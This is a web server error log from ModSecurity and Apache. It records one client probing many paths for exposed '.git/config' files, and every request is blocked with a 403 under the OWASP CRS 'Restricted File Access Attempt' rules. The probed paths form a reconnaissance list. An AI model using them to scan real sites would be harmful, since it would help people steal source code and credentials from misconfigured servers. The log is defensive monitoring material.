[Wed May 29 05:15:29.446008 2024] [:error] [pid 3549404] [client 91.215.85.43:40802] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78AAAAAY"]
[Wed May 29 05:15:29.446020 2024] [:error] [pid 3548012] [client 91.215.85.43:40830] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /samples/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQAAAAAQ"]
[Wed May 29 05:15:29.446304 2024] [:error] [pid 3548012] [client 91.215.85.43:40830] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQAAAAAQ"]
[Wed May 29 05:15:29.446381 2024] [:error] [pid 3549404] [client 91.215.85.43:40802] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78AAAAAY"]
[Wed May 29 05:15:29.446524 2024] [:error] [pid 3548012] [client 91.215.85.43:40830] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQAAAAAQ"]
[Wed May 29 05:15:29.448272 2024] [:error] [pid 3548013] [client 91.215.85.43:40902] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-includes/js/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpoAAAAAU"]
[Wed May 29 05:15:29.448396 2024] [:error] [pid 3548010] [client 91.215.85.43:40892] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wiki/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcSgAAAAI"]
[Wed May 29 05:15:29.448707 2024] [:error] [pid 3548010] [client 91.215.85.43:40892] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcSgAAAAI"]
[Wed May 29 05:15:29.448872 2024] [:error] [pid 3548013] [client 91.215.85.43:40902] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpoAAAAAU"]
[Wed May 29 05:15:29.448940 2024] [:error] [pid 3548010] [client 91.215.85.43:40892] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcSgAAAAI"]
[Wed May 29 05:15:29.449292 2024] [:error] [pid 3548013] [client 91.215.85.43:40902] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpoAAAAAU"]
[Wed May 29 05:15:29.451300 2024] [:error] [pid 3548009] [client 91.215.85.43:40808] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old-cuburn/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KywAAAAE"]
[Wed May 29 05:15:29.451487 2024] [:error] [pid 3548009] [client 91.215.85.43:40808] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KywAAAAE"]
[Wed May 29 05:15:29.451639 2024] [:error] [pid 3548009] [client 91.215.85.43:40808] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KywAAAAE"]
[Wed May 29 05:15:29.539946 2024] [:error] [pid 3548008] [client 91.215.85.43:40752] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WQAAAAA"]
[Wed May 29 05:15:29.543436 2024] [:error] [pid 3548011] [client 91.215.85.43:40926] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7gAAAAM"]
[Wed May 29 05:15:29.543985 2024] [:error] [pid 3548011] [client 91.215.85.43:40926] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7gAAAAM"]
[Wed May 29 05:15:29.544414 2024] [:error] [pid 3548011] [client 91.215.85.43:40926] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7gAAAAM"]
[Wed May 29 05:15:29.546110 2024] [:error] [pid 3549404] [client 91.215.85.43:40764] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /s3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78QAAAAY"]
[Wed May 29 05:15:29.546661 2024] [:error] [pid 3549404] [client 91.215.85.43:40764] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78QAAAAY"]
[Wed May 29 05:15:29.547042 2024] [:error] [pid 3549404] [client 91.215.85.43:40764] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78QAAAAY"]
[Wed May 29 05:15:29.547841 2024] [:error] [pid 3549624] [client 91.215.85.43:40832] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcQAAAAc"]
[Wed May 29 05:15:29.548283 2024] [:error] [pid 3549624] [client 91.215.85.43:40832] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcQAAAAc"]
[Wed May 29 05:15:29.549678 2024] [:error] [pid 3548010] [client 91.215.85.43:40742] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /node_modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcSwAAAAI"]
[Wed May 29 05:15:29.550165 2024] [:error] [pid 3548010] [client 91.215.85.43:40742] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcSwAAAAI"]
[Wed May 29 05:15:29.550564 2024] [:error] [pid 3548010] [client 91.215.85.43:40742] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcSwAAAAI"]
[Wed May 29 05:15:29.550884 2024] [:error] [pid 3548012] [client 91.215.85.43:40774] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /user/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQQAAAAQ"]
[Wed May 29 05:15:29.551324 2024] [:error] [pid 3548012] [client 91.215.85.43:40774] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQQAAAAQ"]
[Wed May 29 05:15:29.551690 2024] [:error] [pid 3548012] [client 91.215.85.43:40774] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQQAAAAQ"]
[Wed May 29 05:15:29.552167 2024] [:error] [pid 3548008] [client 91.215.85.43:40752] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WQAAAAA"]
[Wed May 29 05:15:29.552320 2024] [:error] [pid 3548008] [client 91.215.85.43:40752] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WQAAAAA"]
[Wed May 29 05:15:29.553104 2024] [:error] [pid 3548013] [client 91.215.85.43:40786] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /static/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpoQAAAAU"]
[Wed May 29 05:15:29.553384 2024] [:error] [pid 3548013] [client 91.215.85.43:40786] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpoQAAAAU"]
[Wed May 29 05:15:29.553551 2024] [:error] [pid 3549624] [client 91.215.85.43:40832] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcQAAAAc"]
[Wed May 29 05:15:29.553606 2024] [:error] [pid 3548013] [client 91.215.85.43:40786] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpoQAAAAU"]
[Wed May 29 05:15:29.554223 2024] [authz_core:error] [pid 3548009] [client 91.215.85.43:40776] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Wed May 29 05:15:29.646337 2024] [:error] [pid 3548011] [client 91.215.85.43:40862] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7wAAAAM"]
[Wed May 29 05:15:29.647124 2024] [:error] [pid 3548011] [client 91.215.85.43:40862] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7wAAAAM"]
[Wed May 29 05:15:29.647706 2024] [:error] [pid 3548011] [client 91.215.85.43:40862] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7wAAAAM"]
[Wed May 29 05:15:29.651076 2024] [:error] [pid 3549404] [client 91.215.85.43:40714] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78gAAAAY"]
[Wed May 29 05:15:29.651649 2024] [:error] [pid 3549404] [client 91.215.85.43:40714] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78gAAAAY"]
